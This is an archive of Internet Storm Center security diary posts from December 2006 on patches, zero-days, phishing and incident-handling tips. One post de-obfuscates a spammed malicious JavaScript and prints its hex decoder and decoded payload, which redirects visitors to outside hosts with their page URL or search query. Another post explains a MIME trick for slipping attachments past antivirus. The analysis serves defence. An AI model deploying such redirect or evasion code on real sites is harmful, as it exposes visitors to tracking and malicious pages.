I would recommend that this update or the registry change workaround to any client workstations as soon as possible.

This update replaces  MS06-016  and MS06-043 as it is a cumulative update.


Published: 2006-12-12

MS06-072: Cumulative Security Update for Internet Explorer (925454)

This bulletin addresses four vulnerabilities for Internet Explorer.   Two allow for remote code execution and two allow for information disclosure.  According to Microsoft, this does not affect Internet Explorer version 7.  Since many organizations are still running version 6, it is very critical that you patch this ASAP if you haven't upgraded yet.  This bulletin replaces MS06-067.  There is also a link provided by Microsoft on possible issues that may arise as a result of this patch:  http://support.microsoft.com/kb/925454

Script Error Handling Memory Corruption Vulnerability - CVE-2006-5579
Previously freed memory space is accessed when encountering certain script errors which may cause the system's memory to become corrupt and allow for code execution.

DHTML Script Function Memory Corruption Vulnerability - CVE-2006-5581
When Internet Explorer interprets certain DHTML script function calls to incorrectly created elements it may corrupt system memory in such a way that an attacker could execute arbitrary code.

TIF Folder Information Disclosure Vulnerability - CVE-2006-5578
The issue lies in how Internet Explorer handles drag and drop operations and would allow for files to be accessed on the user's system in the Temporary Internet Files Folder.

TIF Folder Information Disclosure Vulnerability - CVE-2006-5577
This one is similar to the previous vulnerability discussed, however the vulnerability reveals the path to the Temporary Internet Files Folder and allows it to be accessed and files to be retrieved.  According to Microsoft, this requires actions on the user's part for this to occur.


Published: 2006-12-12

MS06-075: csrss local privilege escalation (CVE-2006-5585)

Microsoft has release bulletin MS06-075 which addresses a local privilege escalation vulnerability affecting Windows XP SP2 and Windows Server 2003 in the client/server run-time subsystem (csrss) which is a required component of Windows (in other words, it is always running on all Windows machines).  Note, Vista and Windows Server 2003 SP1 are claimed not to be affected at this time, as is Windows 2000 SP4.

We rate this one as important.  If someone can get access to the system via other means (cracked password, etc.) this vulnerability allows that person to elevate their privileges to become administrator by running a specially crafted executable.

CVE-2006-5585 (this link isn't live yet)


Published: 2006-12-12

MS06-074: SNMP Buffer Overflow (CVE2006-5583)

The Simple Network Manamgenet Protocol (SNMP) service  is vulnerable to a buffer overflow. This service is typically used to manage network devices. Home users are not likely to have this service installed. However, many larger networks will use SNMP to controlle and monitor networked workstations and servers.

Accoridng to a note from Dave Aitel, Immunity released an exploit for this vulnerabilty to its customers.

In order to disable this service, or to check if it is running, use the "services" tab in your control pannel and make sure the 'SNMP Service' is not running. You will not see an entry for SNMP service if it is not installed.

This patch is a "patch now" for all networks that use SNMP. It runs as "system" and a succesfull exploit would provide an attacker with full access. The Microsoft bulletin only talks about port 161 UDP for this vulnerability. So one can assume that SNMP trap messages are not affected.

Common sense SNMP security (regardless of the vulnerability):
  • block port 161/udp and 162/udp at your permiter (snmpv3 may use tcp).
  • use a hard to guess community string (anything but "public").
  • disable snmp listeners if you do not need them.


Published: 2006-12-12

MS06-077: Remote Installation Service (RIS) remote exploit

This vulnerability only affects Windows 2000 Server, Service Pack 4 that has RIS installed that allow anonymous access to the system that serves the installation items. If there is anonymous access, a remote user could view, change, delete data or create accounts including having malware installed on systems installed by RIS. It is possible to exploit this vulnerability over the internet if the network permissions were set that poorly to allow anonymous access to everyone. A simple firewall would prevent this vector. The patch removes the vulnerability by not allowing anonymous TFTP users write access on the file structure.

This vulnerability has not been disclosed publicly and Microsoft reports no indication of active exploitation of this vulnerability.

Microsoft ranks this update as important, however the very specific OS version needed and other mitigating technologies make this an unimportant patch for all but a few users.

Bulletin: MS06-077

John Bambenek
bambenek /at/ gmail /dot/ com


Published: 2006-12-12

MS06-073: WMI Object Broker Vulnerability (CVE-2006-4704)

This one is "highly critical". A working exploit is already available for Metasploit.

The WMI Object Broker is a special ActiveX control which is used by Vsiaul Studio 2005. An attacker would use a malicious web page to exploit it. You have to have Visual Studio 2005 installed in order to be vulnerable. The vulnerable file is WmiScriptUtils.dll.

As with other ActiveX features, Internet Explorer 7 will mitigate them somewhat as you have to "opt-in" to individual ActiveX controlls in order to use them. The restricted mode in Windows 2003 will turn off ActiveX as well, limiting exposure.

What you should do:
- On a client with Visual Studio 2005 installed: Patch now.
- On a client without Visual Studio 2005: you should not have this control.
- On a server:  Check if you are using the "Enhanced Security Configuration" for MSIE. The patch is unlikely to apply.

I do recommend upgrading to Internet Explorer 7 if you are regularly using Internet Explorer.

eEye Advisory


Published: 2006-12-12

Microsoft Black Tuesday - December 2006 overview

Overview of the December 2006 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS06-072 Internet Explorer - remote code execution

No known problems

KB 925454
No known exploits
Critical Critical Important
MS06-073 Visual Studio 2005 - remote code execution

No known problems

KB 925674
Exploit publicly available
Critical PATCH NOW Important
MS06-074 SNMP - remote code execution - buffer overflow

No known problems

KB 926247
Exploit available in for pay program
Important Critical Critical
MS06-075 csrss - privilege escalation

No known problems

KB 926255
No known exploits
Important Important Important
MS06-076 Outlook express - remote code execution

No known problems

KB 923694
No known exploits Important
Less Urgent
MS06-077 RIS - remote code execution

No known problems

KB 926121
No known exploits Important Important Important
MS06-078 Windows Media player - remote code execution

No known problems

KB 923689
KB 925398
Exploits available for the .asx vulnerability
Critical PATCH NOW Important

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- Section 66


Published: 2006-12-12

ICMP - call for packets ?

One of our readers is reporting a fairly recent increase in ICMP packets hitting his firewall. If you're seeing the same we'd like some data:

  • on the importance and timeframe of the increase;
  • the type of ICMP packets you're receiving;
  • some idea of how it correlates (sweeping your address range, just hitting one IP, coming from all over, coming from specific hosts, ...);
  • if possible a small sample of some out of the ordinary packet captures.
As always you can upload your results through our contact form.

Swa Frantzen -- Section 66


Published: 2006-12-12

PHP security: the scene might change

Will drew our attention to an interesting read in Stefan Esser's blog. It's about his resignation from the PHP Security Response Team. It's interesting to note that he both discovered and reported about PHP vulnerabilities in the past.

It seems the bottom line will be that we can expect some changes in how vulnerabilities in PHP are going to be handled in the future. It might include advisories about vulnerabilities without there being patches available. It might also mean an increase in the number of reported vulnerabilities.

Anyway it'll be worth it to add his PHP security blog to your routine if you need to know about PHP vulnerabilities.

Announcements about security vulnerabilities in widely deployed open source software without the matching patch is a very dangerous situation, so we hope this doesn't escalate too far.

Swa Frantzen -- Section 66

Published: 2006-12-10

Another new Word 0-day, information & dat released by McAfee

We received notification from an ISC participant that McAfee has released a dat today for protection against a buffer overflow attack in MS Word. The announcement says "Note: This vulnerability was first found through one of the samples that McAfee analyzed, and this vulnerability differs from the "Microsoft Word 0-Day Vulnerability I" that was published on December 5, 2006.".

Other vendors are expected to follow suit

McAfee "Microsoft Word 0-Day Vulnerability II "

"Vendor Status - Unacknowledged
Vulnerable systems - Windows XP  SP0 - SP2, Windows 2003  SP0 - SP1, Microsoft Word  XP, Microsoft Word  2003"

McAfee has identified PWS-Agent.g as "a password stealing trojan that was most recently installed by Exploit MSWord.b via a 0-day Microsoft Word vulnerability.".

Thanks for the heads up!

eEye Research has a site that's quite useful for tracking 0-days, Zero-Day Tracker

There's a report over at the Microsoft Security Response Center Blog!, see the New Report of A Word Zero Day.
According to the post, "the vulnerability is being exploited on a very, very limited and targeted basis". That is a description that adds further granulization to MS's explanation of "What “very limited, targeted attacks” Means"". And as long as there's no patch forthcoming for this vuln (or the December 5th one), it's starting to sound like using the exploit is going to be "Rewarding, very, very, very rewarding" (see the Citi commercials/video).


Published: 2006-12-08

What will the big security stories of 2007 be?

For the last couple of years, we've asked you what you think will be the big security trends/stories in the coming year.  Well, 2006 is rapidly coming to a close, so I figured we might as well solicit some of those opinions again.  Deb Hale, in her story earlier this week, took a quick look at how you did with your predictions last year and it looks like you did pretty well.  So, what will it be in 2007?  Post your thoughts through our contact page, we'll summarize around the first of the year.


Published: 2006-12-08

nmap-4.20 released

Nmap-4.20 has been released, though the main page at insecure.org still lists 4.11 as the current version.



Published: 2006-12-08

Microsoft December advance patch notification

Microsoft is informing us that there will be 6 patches released on Tuesday.  Five for Windows (with a max severity of critical) and one critical patch for Visual Studio.  Note that there are no patches for Office, so the 2 new Word vulnerabilities reported earlier this week will remain unpatched.

See the MSRC blog entry here.


Published: 2006-12-07

Windows Media Player - ASX Playlist Buffer Overflow

ISS has published an advisory on a buffer overflow found in Windows Media Player 9 and 10 related to handling .ASX playlist files.  This follows a similar advisory by FrSIRT.  It appears that these advisories are coming in response to indications that there are in-the-wild exploits of the vulnerability.  The issue has been public since back on November 22nd.

Read the ISS Advisory, the FrSIRT Advisory, and the original Bugtraq posting.

(Thanks to everyone who sent this in...)


Published: 2006-12-07

Intel LAN Driver Buffer Overflow Local Privilege Escalation

According to Intel, there is a buffer overflow in the drivers for one of their most popular NICs that can be used to escalate privilege locally.  The flaw affects drivers for Intel PRO 10/100 adapters on Windows (>=Win2K), Linux, and UnixWare platforms.  A complete listing of affected driver versions can be found here.

(Note: Thanks to everyone who pointed out that we needed to add an equals sign to the Windows description.)


Published: 2006-12-07

Follow the Bouncing EMule

Robert Danford, one of the other ISC Handlers, happened to mention in the Sooper Secret ISC Handler Chat Room that a co-worker was investigating a local spike in traffic to port 1755 TCP.  In looking at the DShield data, we're seeing levels jumping all over the place.  By capturing packets, Robert's co-worker, Dan Frasnelli, was able to pin down what was flying by: eMule traffic.  Doing a little searching (Google is your friend), we found that the kidz (in response to Eeeeevil ISPs throttling P2P traffic) have decided to use 1755 TCP.  Why?  Well, because Windows Media Server lives on that port, and they believe that they'll stand less chance of getting throttled.  We've seen them move ports before: from 4662 -> 6662.

You know... if some of the people putting all of the thought and energy into obfuscating JavaScript, writing malware, getting P2P around ISPs, etc... want to stop by my house, I've got a "honey-do" list about 10 pages long that they could work on.


Published: 2006-12-07

Malformed MIMEs can bypass AV

Over on Quantenblog, they're reporting that malformed MIME attachements can, in some cases, be used to bypass email AV filtering.  It works like this:  because email standards were written back in the day when messages were only text (as God intended), they only guaranteed that 7 of the 8 bits in a byte would make it through.  Now that emails contain everything from spreadsheets and executables to pretty-formatted dancing gerbils, we need a way to send the full 8 bits, while still meeting the original standards.  To do this, we need a means of encoding 8 bit content into 7 bit email messages.  One encoding scheme uses an "alphabet" containing 64 characters, and essentially takes 3 bytes of data and turns them into 4 bytes of encoded information.  This is what Multipurpose Internet Mail Encoding (MIME) and specifically MIME64 is all about.  The standard for MIME encoding (RFC 2045) says that when you're decoding, if you come across a character that isn't part of your "alphabet," you're supposed to ignore it and move on.  The problem arises when an AV engine doesn't follow this standard, and an email program does.  The AV engine doesn't scan the attachement properly, but the email program presents the fully decoded attachment for the end-user's clicking pleasure.

More info: http://www.quantenblog.net/security/virus-scanner-bypass

Update: Hendrick over at Quantenblog asked us to clarify the info on this a bit... In most cases, altering the MIME64 encoded content isn't sufficient to bypass AV.  Additional layers of "multipart/mixed" nestings are required (and in some cases, extreme nesting depths themselves can cause resource exhaustion in AV products).

(Thanks Robert!)


Published: 2006-12-07

Climb a small mountain...

I really love malware authors who write their stuff in JavaScript.  They try so hard to be like real programmers... and they're just so gosh-darned cute.

They're at their especially "I-want-to-be-a-big-boy-programmer" best when they jump through all sorts of hoops to obfuscate their handiwork.  It's almost as if they don't realize that they're programming in toy language that's INTERPRETED...

So yesterday, I'm sitting in an airport waiting standby on a flight to get me home in time to see my daughter's choir concert, and my cell phone rings.  According to Caller ID, it's Ed Skoudis - friend, fellow Intelguardian, fellow ISC Handler, and all-around infosec stud.  I answer it anyway.

"Hey buddy!  How's it going?" I hear Ed's all-too-chipper voice through the phone.  

"Hmmm...," I think, "feigned pleasantry coupled with a fraternal 'buddy' reference.  Ed wants something."

"Hey... I have a favor to ask you..."

And so Ed, who was ISC Handler-on-duty, went on to explain that he'd received an email from a reader who had come across what appeared to be some sort of encoded JavaScript.  According to the reader, the script was found on a webpage that had been spammed to several blogs, and he was concerned that there might be something evil going on.

"Generally if you're on the up-and-up, you don't feel the need to obfuscate what you're doing," was Ed's conclusion.

Can't argue with that.

"So, what do you need me for?" I asked.

"Well... I'm really kind of swamped, both with HOD stuff and real work stuff, and I know how much you like this kind of thing..."


"Ok... send it to me."

After shooting the breeze with Ed for a few more minutes, I hang up and flip open my laptop, planning to hop onto the local public WiFi and ssh my way into the mailserver… only to find that there IS no public WiFi available.

Sigh... #2

"Ok," I decide, adopting my best those-grapes-are-probably-sour-anyway attitude, "my laptop is too dang big to use on a plane comfortably anyway.  I'll just work on it tonight when I get home."  But as the minutes to my flight tick away, I find myself looking at my shiny new "Windows Mobile" cell phone, and an evil plan begins to take shape.

"Nah...," I think, "it would never work... but it would sure be cool to try..."

So, as the clerks begin calling different groups for boarding, I furiously kick off the mail client on my phone, grab Ed's message from the server and save it as a text file.

A few minutes later, I'm seated on the plane, looking at the text of the email message in Pocket Word.  I work down through the message, deleting everything but the actual text of the script:

var arr =

 ... many, MANY rows of numbers deleted ...


var table = new Array();
table['0'] = 0;table['1'] = 1;
table['2'] = 2;table['3'] = 3;
table['4'] = 4;table['5'] = 5;
table['6'] = 6;table['7'] = 7;
table['8'] = 8;table['9'] = 9;
table['a'] = 10;table['b'] = 11;
table['c'] = 12;table['d'] = 13;
table['e'] = 14;table['f'] = 15;
function markCounter(a) {
  var txt = ""; var c = 0;
  while (c < a.length) {
    txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]);
    c += 2;
demo = ""+false;details = "false";
if (demo == details) {

I slap an <html><head></head><body>...</body></html> framework around the script, and I'm ready to delve into the code itself.

The first thing that strikes me is the "eval(txt)" call.  That's where the actual rubber meets the road in this script.  I'll need to take care of that.

I replace "eval(txt)" with the following:

document.write("<textarea rows=50 cols=50>");

I also get rid of all the "demo" crud at the bottom, replacing it with a simple call:


Having done that, I change the name of the file from "edsmail.txt" to "edsmail.htm," and fire it off in Pocket IE.

It displays my TEXTAREA, but... well... nothing else.  Perhaps I'm not as clever as I think I am.


Turns out, it was the JavaScript jockey who wasn't so clever.  Dude... if you're out there and reading this, take some notes, ok? You can't access a string using array notation: "a[c]" doesn't work.  Here's how you fix it:  you need to replace "a[c]" with "a.substr(c, 1)"

I correct Mr. LeetHaxor's code, and it promptly dumps the following into my TEXTAREA:

var ref = document.referrer;
var loc = document.location.href;
if (ref.indexOf("google") == -1 && ref.indexOf("yahoo") == -1 &&
ref.indexOf("msn") == -1) {
document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
} else {
if (ref.indexOf("site:") >= 0 || ref.indexOf("site%3A") >= 0) {
 document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
} else {
 var re = new RegExp("http:\/\/([a-z0-9\-A-Z\.]*)\/");
 var domain = re.exec(loc);
 if (domain == null) {
  document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
 } else {
  re = new RegExp("\\.([a-z0-9\-A-Z\.]*)");
  topdomain = re.exec(domain[1]);
  if (ref.indexOf(domain[1]) != -1 || ref.indexOf(topdomain[1]) != -1) {
   document.location.href = "http://activefreehost.com/removed.php?url=" + loc;
  } else {
   re = new RegExp("q=[^&]*");
   var m = re.exec(ref);
   if (m == null) {
    re = new RegExp("p=[^&]*");
    m = re.exec(ref);
    if (m == null) {
     document.location.href =
"http://activefreehost.com/removed.php?url=" + loc;
    } else {
     var q = m[0].substring(2);
     q = q.replace(/\+/, "_");
     q = q.replace(/\s/, "_");
     document.location.href = "http://stuphome.com/p/" + q + ".html";
   } else {
    var q = m[0].substring(2);
    q = q.replace(/\+/, "_");
    q = q.replace(/\s/, "_");
    document.location.href = "http://stuphome.com/p/" + q + ".html";

Looks like someone is VERY interested in referrer info, but doesn't want anyone to know it.

So... all of you JavaScript geniuses out there, please take note:  I "cracked" this obfuscation while munching on in-flight pretzels and working ON MY CELLPHONE.  If you seriously don't want someone to know what you're up to, then I think your encoding techniques should require cracking on something that doesn't ring...

Tom Liston - Senior Security Consultant - Intelguardians


Published: 2006-12-06

Adobe Acrobat Update

Adobe has classified the recent vulnerability as a critical issue and are recommending that the Acrobat reader be upgraded to version 8 or as a minimum the affected dll is replaced. 

To quote them directly they are saying "Adobe categorizes this as a critical issue and recommends affected users uninstall any affected software."

Their advisory can be found here

You may need to take steps to test and patch/upgrade your end user systems.

Thanks Matt for the pointer.

ISC Handler on Duty


Published: 2006-12-06

GnuPG new versions-upgrade now

GnuPG.org has released versions 1.4.6 and 2.0.1 of GPG, the popular free PGP replacement to address the vulnerabilities noted in CVE-2006-6235, a code execution vulnerability triggered by a malformed message/file.  You are urged to upgrade as soon as possible.

Announcement: http://lists.gnupg.org/pipermail/gnupg-announce/2006q4/000245.html
GPG home: http://www.gnupg.org


Published: 2006-12-06

IPv6 and Security

For last two days I have been at an IPv6 conference.  Not knowing much about the protocol, like many of us my daily troubles lay in the IPv4 space, I was looking forward to learning exactly what the big deal was.  More importantly how it affects security and what the implications for our clients are.  As one of the speakers said "some security issues will be worse, some better and most of them the same", filling me with hope that I'll still be employed in the IPv6 world.

The first hurdle is to remember that it is just another protocol.  Think of it like IPX, SNA, Appletalk, Decnet, take your pick.  It is a convenient way of getting traffic from point A to point B.  The main reason for changing to IPv6 is the increase in the number of available addresses.  IPv4 addresses according to the presentations will run out in the next 6 years or so.

A second hurdle is to remember the difference between end-to-end addressability and end-to-end connectivity.   A number of the presentations saw IPv6 as a way of providing the latter, which tends to scare security people.  Peer 2 Peer processing, across firewalls, networks etc (I can hear the squeals of protest "not over my network you don't").   As far as I understand it, IPv6 will provide end to end addressing, which is different.  Knowing how to get to a device is one thing.  Being allowed to do so is another.  It will also make the need to NAT obsolete.

Now for the security side of things, IPSEC is mandatory.  So if you wish, you can secure communications from end to end, between two addressable (and reachable devices).  If you have ever set up a VPN between two different vendor products you know that it can be a challenge.  The second part of the problem is this, are you comfortable allowing IPSEC tunnels through your perimeter?  BTW I'm not saying the IPSEC features are bad, I just think there will be some challenges to overcome.

One of the presenters today mentioned that reconnaissance and malware propagation will be more difficult in the IPv6 world.  There is such a large address space that needs to be checked, it would take such a long time to scan the address range that the effort is not worth while (think several thousand years).  However IPv6 does rely heavily on two things, DHCP and DNS, DHCP to allocate addresses and DNS to find things in the network.  That in itself is interesting as it provides two convenient targets on an IPv6 network.  Randomly scanning for available hosts may not be required as you may be able to get all the information you need from one of these devices.  I think malware will just take advantage of what is available.

As for other threats there are many that will not change much, if at all.  You can still sniff the network.  Application layer attacks don't change, rogue devices can still be inserted into the network and may even be more difficult to detect. Man in the middle attacks still work.  Flooding, spoofing and a whole host of other attacks are all still possible.

IPv6 networks are already and will continue to be deployed within organisations.  Connectivity via the internet will slowly start to appear over the next few years as ISP's and Telco's change their infrastructure (no real business driver as yet).  In the mean time not many firewalls deal with this protocol sensibly, nor do a number of other security devices such as IDS/IPS.  So there is a fair way to go before the protocol can be securely used.

As a final thought, one of the presentations mentioned that Vista will have IPv6 enabled by default, with some functionality only fully available when IPv6 is used.  This in itself has some implications for us all.  One thing that interests me is how the IPv6/IPv6 combination is handled.  In XP for example, when IPv6 is enabled it has preference.  So a connection attempt is made using IPv6 first.  Once the timeouts are reached an IPv4 request is performed.  This can have a noticeable performance impact.  If someone knows how Vista behaves in this instance I'd be interested to find out.  If it is the same as XP, then I can see a lot of helpdesk calls complaining about slowness of the network.

There is much more to IPv6 than the above, but I'll leave that for another time, I'm still digesting all the information



ISC Handler on Duty


Published: 2006-12-05

Word Zero-Day, So Sayeth Microsoft

Microsoft released an announcement of a zero-day vulnerability in Microsoft Word.   Read about it here.

Of particular interest, they say:

"Microsoft is investigating new public reports of limited 'zero-day' attacks using a vulnerability in Microsoft Word 2000, Microsoft Word 2002, Microsoft Office Word 2003, Microsoft Word Viewer 2003, Microsoft Word 2004 for Mac, and Microsoft Word 2004 v. X for Mac, as well as Microsoft Works 2004, 2005, and 2006.  In order for this attack to be carried out, a user must first open a malicious Word file attached to an e-mail or otherwise provided to them by an attacker."

Microsoft's advice?  They say, "Do not open or save Word files that you receive from un-trusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted Word file."

Ok... sure.  Thanks.

--Ed Skoudis


Published: 2006-12-05

IBM Tivoli Storage Manager Buffer Overflow Vulns and Patches

Looks like IBM Tivoli Storage Manager has a few buffer overflow vulnerabilities.  Read more about them here, courtesy of Tipping Point.

The money quote:

"These vulnerabilities allow attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Storage Manager. Authentication is not required to exploit these vulnerabilities.  The specific flaws are similar and exist in the processing of messages by the Tivoli Storage Manager service, bound on TCP port 1500. "

Patches from IBM described here.

Looks like IBM thinks they cannot be exploited, as they say, "This problem relates to an internal buffer overflow in TSM but IBM does not believe it is possible to exploit this buffer overflow for remote code execution, however, this exposure can be used to crash the TSM server."

Either way... if you use Tivoli, you should analyze this carefully.


Published: 2006-12-05

Fun With Windows Netstat

I've often lamented the fact that Windows does not have a built-in lsof-like tool.  On Linux and UNIX, lsof gives all kinds of details about what various processes are up to.  Sure, we've got the Microsoft Sysinternals Process Monitor tool, which is really cool, but is not built in.  And, of course, Windows doesn't include a built-in sniffer…

One technique that I've been using a lot in incident handling, vulnerability assessment, malware analysis, and other sysadmin work over the last few months involves the traditional, humble netstat tool.  Although netstat is limited, I've found a specific use of it to be tremendously helpful.  Here are some scenarios.

Fellow handler Mike Poor and I were at a client site, and Mike was doing a network scan.  I had one of the client's laptops, on which we could install no additional software.  I wanted to see when Mikey's wide-ranging scan reached my box, which did have an open port.  Here's what I ran:

C:\> netstat –na 1 | find "[Scan_Host_IP_Addr]"

The netstat command, used this way, shows TCP and UDP port activity.  The –n means to list numbers.  The –a indicates that we want all connections and listening ports.  In Windows netstat, the 1 means we want to run every second, repeatedly dumping the output on standard out.  And, we are looking through our output with the find command to see an indication of when Mike's box had accessed ours.  Note that I'm using find here, but another alternative would be the findstr command.  The find command can locate strings nicely, but findstr can process regular expressions.  I believe in using the appropriate tool for the job, and these simple searches work just fine with find.  If you want regexp stuff, use the more powerful findstr command.  Anyway, because the 3-way handshake or an actual connection will likely last more than 1 second, this technique will work.  Sadly, the technique does not work to capture sub-1-second events.  As Mikey continued the scan… Bingo!  We could see with 1-second accuracy when it reached my box.

I've used this technique elsewhere as well.  A gentleman taking the SANS Security 504 class had a dilemma.  He was seeing a weird ICMP Host Unreachable message in his network.  When he looked at the destination address, it was going from his router back to his Domain Controller.  So, his DC was pushing out a packet to a machine that his router couldn't reach.  But, what process on his DC was sending this packet?  On the Domain Controller, we ran:

C:\> netstat –nao 1 | find "[Dest_IP_Addr]"

Here, I've added the –o flag, which makes Windows netstat print the PID.  You can then look up that PID using "wmic process list brief", "tasklist", or, if you insist, Task Manager (yuck!).  Then, you can see what process is emitting that packet, provided that it is using the TCP or UDP stack of Windows to send it, and that it takes at least a second.  Note that netstat also offers the –b flag, which makes it show the EXE and its associated DLLs that are using TCP and UDP ports.  However, I didn't use –b here, because it seriously hurts performance.  For whatever reason, it takes netstat a lot of CPU cycles to get the EXE and DLL info, cycles that we cannot spare on a Domain Controller.  And, running "netstat –naob" every second would be a serious drain on processor resources.

Here's another one.  We were working on an investigation where an evil process would start up, and eventually (not instantly) listen on TCP port 2222.  We wanted to know when it started listening, so we ran:

C:\> netstat –na 1 | find "2222"

And, here's one final one for you.  I was working on an investigation, and we had a process listening on a given TCP port (let's say, for example, it was TCP port 4444).  We wanted to know when the bad guy connected to it.  We ran:

C:\> netstat –na 1 | find "4444" | find "ESTABLISHED"

This will print nothing until the output of netstat includes an established connection on port 4444.  So, with approximately 1-second accuracy, we were able to see when someone connected to the port, knowing that our bad guy had come calling.  Also, this output includes the source IP address connected to the port, a helpful thing in an investigation.

Now, obviously you could do all of this with a sniffer, with more accuracy and detail.  But, netstat is built-in, and these command are easy and quick to type.

--Ed Skoudis.
Handler on Duty


Published: 2006-12-04

Is your banks Online security policy making it more of a target for Phisher's?

This morning in the Handler's secret room, we were having a discussion about financial institutions and there supposed security policy making them a lucrative target for spamming and phishing.  Our discussion centered around
how they attempt authenication and if this authenication actually increases the likelihood that your account will be compromised. 

One example:
A bank or financial institution implements a security policy that requires you to answer a question in addition to your user id and password.  This sounds great right, a "two factor" method of identification.  Well, maybe not...  You see, if you can't answer the guestion correctly in addition to your correct user id and password, your account gets locked out.  Ok so now what.  You call the bank and say darn it all my account got locked out....  What does the bank say?  Ok we will reset your password, what email address do you want the new password sent too. Oh, by the way - the new password email will not come from us.  We have someone else send it.  Hmmmm....  Oh - by the way, you may want to check your spam filter because the email make get stopped.

Seriously, What are they thinking? 

What do you think?  Does your bank or financial institutes method of authentication make you a more lucrative target?


Published: 2006-12-04

Speaking of Predictions

Last year in December I posted a diary asking for predictions from our readers about what they thought the New Year would bring. 

Let's take a look at what our readers said:

Predictions 2006

So how did we do?

1) Web Born Worms - Yep, there has definitely been an increase in them.  From MySpace to CNNWarNews we have seen an increase in worms inplanted and ready to move at a moments notice.
2) RSS Malcode - Again, we have indeed seen an increase in RSS exploits.
3) Trojans outpace worms - If you take a look at Symantec, McAfee and other AV software companies, I think you will see that this too has come to pass.  There are more "Trojanesq" exploits than actual viruses and worms.  I think the criminal types have figured out that they Trojan's are more profitable.
4) Voice over IP phishing - Yes - we have indeed seen a few of these this year.
5) Xbot 360 - Hmm - Not sure about this one.  I haven't heard anything about this at least.
6) Cross Site Scripting attacks - Oh yeah, we have indeed seen a few of those.
7) Zero days - We have seen an increase in zero days. 

So I would say our readers did pretty well.  6 out of 7 ain't bad.

So what do you think? What will 2007 hold in store for us?   More of the same or something new on the horizon. Let us know.


Published: 2006-12-04

Phishers Don't Like Monday

"Symantec is declaring 2006 as the year that fraud grew up."

That is an interesting opening to the article that discusses the changes that Symantec has witnessed over the last year in regards to phishing and the evolution of the tactics and methods used to attempt to defraud the cyber community.  According to their observations they indicate an increase in VOIP and SMS targets. 

Symantec's observation is that the bad guys like 3 day weekends as well and take a break from their life of crime.  They also indicate that Mondays are usually the quietest days for new phishing emails and Tuesday they ramp back up.  Humm.  Interesting, guess I will have to pay closer attention to the spam in my filter.

Vnu Article


Published: 2006-12-04

McAfee's Top 10 Predictions for 2007

McAfee predicts that malware hidden inside Video Files will be the item plaguing computer users this coming year. 

According to McAfee,  "The malware phenomenon is fuelled by a growing online market for identity theft, spam and adware. This is prompting criminals to more closely mimic the processes that have been adopted by legitimate software developers such testing and quality assurance procedures, the security vendor observed."

With the recent discovery of the "realor worm" which they indicate is just the first of many "Movie Trojans". They maybe on to something.  Unfortunately the bad guys will do whatever it takes to make money. 

To see the other items on their list of top 10 take a look at:

Viruses coming to a screen near you.


Published: 2006-12-04

New Hacker Challenge

Hey, challenge fans!  To close out the year, I've posted a Christmas-themed hacker challenge, this one based on the movie, A Christmas Story.  You remember that one... with the Messy Marvin kid, the interesting lamp, and the Red Rider Beebee gun.  In this challenge, you get to help Ralphie explore his Old Man's network, trying to retrieve a copy of his parent's Christmas gift list.  But, be careful, or else you'll hack your eye out!  Entries are due by December 22, when we'll award three winners a copy of my book.

--Ed Skoudis


Published: 2006-12-02

Phishing and Spamming via IM (SPIM)

Our reader Robert has shared with us on a case that a malicious file was detected when one of his user click on a link that arrived via MSN messenger. The malicious file is identified by MSNMaker or Licat.gen.

It has been getting common that attackers are hijacking IM for phishing attempts. Most people are getting aware of phishing through email and smarter not to fall into the trap. However, using IM to trick people may still not as well known to most people. You should not blindly trust links received in IM, even if the link comes from a friend. Such links could be part of an IM worm or bait for a phishing scam.


Published: 2006-12-02

MySpace QuickTime Worm

Juha-Matti has sent us some information regarding malicious codes spreading on MySpace network using Javascript support within Apple's embedded QuickTime player. Websense has also confirmed this.

Extracted from Websense writeup:

Once a user's MySpace profile is infected (by viewing a malicious embedded QuickTime video), that profile is modified in two ways. The links in the user's page are replaced with links to a phishing site, and a copy of the malicious QuickTime video is embedded into the user's site. Any other users who visit this newly-infected profile may have their own profile infected as well.

An infected profile can be identified by the presence of an empty QuickTime video or modified links in the MySpace header section, or both.

More details:


Published: 2006-12-01

404dnserror Adware

Our read Tom sent us a note about a site called "404dnserror/dot/com" (DO NOT VISIT).

A user of his was infected with some spyware/adware. It kept redirecting them to the '404dnserror' page. The page looks like a generic server error, but also advertises an anti-spyware tool in the form of an ActiveX like installer toolbar at the top of the page. To save you the risk of exposing yourself to the site, I included a screen shot below (click on the image to see the full page).

Its probably save to block/montor access to this domain.


Published: 2006-12-01

New Data Retention Rules Effective Today

This one hit me a bit by surprise. A couple readers wrote about it asking for advise. Our reader Steve found a good authoritative source at Lexis Nexis .
I am not a lawyer, and the article doesn't exactly provide anything new to me. As far as I know, electronic evidence like e-mail archives has been "fair game" for discovery all along and as a sysadmin you could get into trouble for deleting any archives after being asked not to do so.

You may just want to sent the link to your corporate lawyer and have them figure out if any policies need to be changed. This should only affect US based corporations.


Published: 2006-12-01

Port 80 UDP Malware

